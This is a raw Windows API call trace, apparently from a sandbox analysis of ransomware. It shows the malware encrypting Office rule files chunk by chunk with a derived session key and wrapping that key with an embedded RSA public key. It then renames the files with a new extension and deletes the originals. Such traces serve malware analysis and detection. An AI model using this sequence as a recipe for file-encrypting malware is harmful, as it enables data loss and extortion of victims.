[0268.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.846] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.846] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.847] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.847] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.870] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.870] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.871] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.871] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.871] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.871] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.871] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.872] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.872] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.872] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.872] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.873] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.874] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.875] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.875] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x158, lpOverlapped=0x0) returned 1 [0268.875] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x158, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x160) returned 1 [0268.875] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x160, lpOverlapped=0x0) returned 1 [0268.875] CloseHandle (hObject=0x5d48) returned 1 [0268.875] CloseHandle (hObject=0x5d3c) returned 1 [0268.875] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml"), bFailIfExists=0) returned 1 [0268.884] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0268.885] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml.gsg")) returned 1 [0268.887] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml.fuck")) returned 1 [0268.889] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0268.889] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0268.889] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.889] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.889] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.889] GetLastError () returned 0x0 [0268.889] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml")) returned 0x20 [0268.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.897] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.897] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.898] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.899] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.903] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.903] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0268.903] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.903] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.903] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.903] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.903] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26780) returned 1 [0268.904] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26780, dwCertEncodingType=0x1, pInfo=0x2f2fb90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2fbc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2fbc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e18828) returned 1 [0268.904] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.904] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25f00*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25f00*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.904] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f25f00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25f00*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.907] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.922] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.922] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.926] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.926] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.926] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 